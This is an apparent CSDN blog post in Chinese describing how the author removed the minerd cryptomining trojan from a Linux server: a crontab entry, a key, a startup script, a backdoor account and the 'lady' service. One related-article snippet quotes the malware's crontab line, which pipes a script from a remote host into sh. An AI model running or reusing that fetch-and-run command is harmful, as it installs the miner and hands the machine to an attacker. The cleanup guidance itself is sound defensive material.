minerd木马处理流程

最新推荐文章于 2022-09-07 20:06:04 发布
最新推荐文章于 2022-09-07 20:06:04 发布
阅读量925 收藏
点赞数
分类专栏: 系统/安全 文章标签: 木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010370142/article/details/52048195
版权

传送门:http://note.youdao.com/yws/public/redirect/share?id=dd042b18d979a5b3e9d765bba02c3d77&type=false
首先说一句,这木马太恶心了,卧槽
首先在服务器发现minerd 程序

ps -ef|grep minerd

然后发现crontab 定时任务

根据这个地址看看

攻击脚本,我就不分析了,大致是获取系统权限等等

首先删除生成的秘钥

然后暂停定时任务

暂停服务

删除/opt/minerd 文件

记住这里有个坑,此时已经暂停掉任务了但是那个进程还在,我特么就奇怪了,可能出现的原因是已经进入定时任务后,暂定这个服务但是任务还在

这时候需重新检查下服务器

然后可笑的是重启服务后特么又启动了,还是得检查脚本

好吧用于这货竟然在开机启动项里面加入了脚本开机又启动了,删除
发现后门账号,删除

ok 重要木有问题了

这个服务一定要删除 lady~~~

王孙小蛮
关注
专栏目录
minerd肉鸡木马排查思路
银时经验积累
07-29 520
Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的PID为1170,根据进程ID查询一下产生进程的程序路径 执行ll /proc/PID/exe,其中PID/exe,其中PID/exe,其中PID为查询到的进程ID 异常程序在/opt目录下 此程序一
一次 minerd 肉鸡木马的排查思路
weixin_43770745的博客
08-29 1002
备注:根据 ps 查询结果显示 minerd 有向域名 xmr.crypto-pool.fr 进行数据通信,通过 ping 测试域名解析核实此域名对应的 IP 地址,然后在 ip.taobao.com 进行查询显示 IP 为法国的 IP,然后通过 iftop -i eth1 -PB 命令对流量进行了监控,确实存在向法国的 IP 发送数据的情况,为了避免再次被入侵,可以通过 iptables 屏蔽对应的异常 IP(具体的 IP 和域名要根据实际查询的情况而定,可能会有所不同)。...
Linux主机肉鸡木马minerd导致CPU跑满
chepei9387的博客
06-22 161
摘要:Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 Linux主机肉鸡木马minerd...
CentOS 服务器因 Redis 遭遇挖矿程序 minerd 入侵事件记录
Dancen的专栏
07-18 3534
事件经过: 周六早上监控服务器发送报警,连续多次无法建立与一台应用服务器的连接。 情况紧急,登录时发现该应用服务器并没有崩溃。 执行: ps -ef | grep nginx 结果显示相关服务还健在。 执行: uptime 发现,服务器的负载非常高。 执行: top 发现,有一个叫做minerd的进程占用了几乎所有cpu资源。 百度“centos minerd”,搜索结果显
一次服务器被挖矿木马攻击的经历
Lisong_jack的博客
06-11 615
基本情况介绍: 使用TOP命令,查看所有进程占用资源情况,发现存在一个进程,占用大量CPU资源和内存资源。进入/proc/<PID>目录下,看到该进程的命令来源于/tmp下。使用kill -9 <PID> 命令杀死该进程之后,一会又有新的进程产生,依然占用大量CPU。 于是猜想可能存在定时任务或者其守护进程。使用systemctl status ...
linux top下的 minerd 木马清除方法
09-15
下面小编就为大家带来一篇linux top下的 minerd 木马清除方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Linux清除木马minerd
骆驼大笨笨
08-02 9933
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
win10系统错误:Mineud.exe-系统措误 ,无法启动此程序,因为计算机中丢失iUtils.dll。尝试重新安装该程序以解决此问题。
guyuelin123的博客
09-07 2万+
邻居电脑一直开机就弹出se qing 弹窗,电脑本身安装了腾讯管家,通过管家杀毒、弹窗设置后,还是不能出来。后续有安装了火绒通过杀毒和弹窗设置后,开机没有在弹出se qing 弹窗,但是有提示 Mineud.exe-系统措误 ,无法启动此程序,因为计算机中丢失iUtils.dll,尝试重新安装该程序以解决此问题。
解决windows的挖矿木马
tomatozq的专栏
06-22 1840
如何在不重装系统的情况下删除挖矿木马
记一次Windows Server 2008 服务器被植入挖矿木马处理
a18218401470的博客
01-14 1984
概览 CentOS 6.5转Windows Server 2008 阿里云CES 运行环境:ASP.NET运行环境(2.0/3.5/4.0+MySql5.5) 部署情况:C#部署在IIS7.1上,Python服务部署在Apache2.4,SQL Server,MySql 部署方式:由于IIS与Apache均需要使用80端口,所...
Trojan专杀工具,用着真不错.
03-19
Trojan专杀工具,用着真不错;我在网上找了好长时间才长到的,愿意与大家一块来分享.另外,本人是教育行业的,分享一个好的英语资料下载站:http://www.51tjw.com
阿里云服务器被挖矿程序minerd入侵的终极解决办法
热门推荐
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
minerd解决随记
Show something
09-28 346
万恶的minerd挖矿木马,手段很高明,彻底根治比较难,先写个定时脚本压制下。核心命令ps -ef|grep "./minerd"|awk '{print $2}'|xargs kill修改定时任务# Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # |
清除wnTKYg 这个挖矿工木马的过程讲述
u010789532的博客
04-23 9294
由于工作需要,我由一个专业java开发工程师,渐渐的也成为了不专业的资深的运维工程师了。感慨一番,书归正传,下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率300%, 这个挖矿工木马的过程讲述" title="清除wnTKYg 这个挖矿工木马的过程讲述" style
服务器被植入挖矿木马程序纪实(第二次)
andyguan01_2的博客
05-07 6433
今天这篇文章的标题是“服务器被植入挖矿木马程序纪实(第二次)”,为什么加了个“第二次”,因为之前已经发生过一次(可点此查看:服务器被植入挖矿木马程序纪实)。当时只是解决了问题,没有找到根本原因,这次又碰到了,情形和上次略有不同,好在最终找到了原因所在,下面细细说来。 一、发现问题 首先是接到运维同事告知,说服务器有频繁的异常请求,导致端口访问被服务商阻断: 二、解决问题 有了上次的经验,首先查看...
记一次服务器被植入挖矿木马cpu飙升200%解决过程
weixin_33736048的博客
03-29 1080
2019独角兽企业重金招聘Python工程师标准>>> ...
阿里云服务器被挖矿minerd入侵的解决办法
weixin_30439067的博客
07-18 261
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到始作俑者...
WIN10缺失DLL处理方法
哈哈一笑
06-25 2156
下载缺失的DLL 直接到脚本之家运行库 下载即可,64位的电脑默认是支持32系统的DLL的,所以32位基本是可以通用的 复制DLL到系统目录里 32位系统: C:\Windows\System32 64位系统: C:\Windows\SysWOW64 安装DLL 32位系统 regsvr32 %windir%\system32\libpng16.dll /s 64位系统 regsvr32 %windir%\SysWOW64\vcruntime140d.dll /s ...
无法启动此应用因为计算机丢失,开机无法启动此程序因为计算机中丢失怎么回事...
weixin_34640844的博客
07-03 7358
类型:系统优化大小:1.8M语言:中文 评分:6.0标签:立即下载不少小伙伴们在开机的时候遇到了无法启动此程序因为计算机中丢失,遇到这个情况,很多小伙伴们不知道怎么回事,想要知道该怎么办的小伙伴们,就让小编给大家详细的讲讲吧。开机无法启动此程序因为计算机中丢失怎么回事1,去下载或者到别人计算机复制相同系统相同名称的 *.dll 动态链接库文件,然后在将该“名称.dll”文件复制到自己电脑上重新注册...
标准病毒处理流程:识别、应对与防护策略
"已知病毒问题标准处理流程-病毒处理技术" 是一项关于网络安全的专业课程,由Martin Chen提供,主要关注于应对和解决计算机病毒问题。课程的核心内容包括病毒概述、病毒分类、威胁分析、防病毒产品和工具、以及病毒...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值